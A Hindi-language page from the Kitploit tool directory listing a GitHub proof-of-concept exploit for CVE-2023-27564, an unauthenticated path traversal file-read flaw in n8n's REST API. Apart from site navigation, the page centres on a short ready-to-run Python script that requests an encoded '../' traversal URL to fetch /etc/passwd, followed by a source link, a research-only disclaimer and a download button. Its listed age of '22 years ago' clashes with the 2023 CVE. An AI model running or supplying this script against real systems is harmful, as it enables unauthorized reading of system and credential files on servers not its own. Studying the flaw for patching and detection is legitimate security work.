Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
exploit-CVE-2023-27564 — CVE-2023-27564 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो n8n में REST API में पथ ट्रैवर्सल के माध्यम से अनाम फ़ाइल पढ़ने में सक्षम बनाता है। सुरक्षा अनुसंधान और भेद्यता मूल्यांकन के लिए अभिप्रेत है। | Kitploit
उपकरण/GitHubGitHub/david-botelho-mariano/exploit-cve-2023-27564
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubdavid-botelho-mariano/exploit-cve-2023-27564

exploit-CVE-2023-27564

CVE-2023-27564 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो n8n में REST API में पथ ट्रैवर्सल के माध्यम से अनाम फ़ाइल पढ़ने में सक्षम बनाता है। सुरक्षा अनुसंधान और भेद्यता मूल्यांकन के लिए अभिप्रेत है।

रिपॉजिटरी देखें
22 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-27564 के लिए शोषण

यह भेद्यता n8n में अनाम फ़ाइल पढ़ने की अनुमति देती है।

import requests

url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"

response = requests.get(url)

print(response.status_code)
print(response.headers)
print(response.text)

स्रोत

https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf

अस्वीकरण

इस रिपॉजिटरी में प्रदान किया गया प्रूफ ऑफ कॉन्सेप्ट (PoC) केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। जानकारी और कोड का उपयोग साइबर सुरक्षा पेशेवरों और शोधकर्ताओं द्वारा सॉफ्टवेयर और सिस्टम में भेद्यताओं को समझने और उनसे बचाव के लिए किया जाना है। पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए इस PoC, संबंधित जानकारी या कोड का कोई भी उपयोग अवैध है और सख्त वर्जित है।

इस PoC का उपयोग करके, आप सहमत हैं कि आप इसके द्वारा प्रदर्शित भेद्यता के संभावित प्रभाव को समझते हैं और इसका जिम्मेदारीपूर्वक और नैतिक रूप से उपयोग करेंगे। इस PoC के लेखक इस सामग्री के किसी भी दुरुपयोग या प्रदान की गई जानकारी और कोड के उपयोग से होने वाली किसी भी क्षति के लिए किसी भी देयता से इनकार करते हैं। सभी लागू स्थानीय, राज्य, राष्ट्रीय और अंतर्राष्ट्रीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है।

लेखकों ने इस रिपॉजिटरी में प्रदान की गई जानकारी की सटीकता और विश्वसनीयता सुनिश्चित करने के लिए हर संभव प्रयास किया है। हालांकि, जानकारी बिना किसी प्रकार की वारंटी के "जैसी है" प्रदान की गई है। लेखक निहित जानकारी की सटीकता, सामग्री, पूर्णता, वैधता या विश्वसनीयता के लिए कोई जिम्मेदारी या देयता स्वीकार नहीं करते हैं।

टूल डाउनलोड करें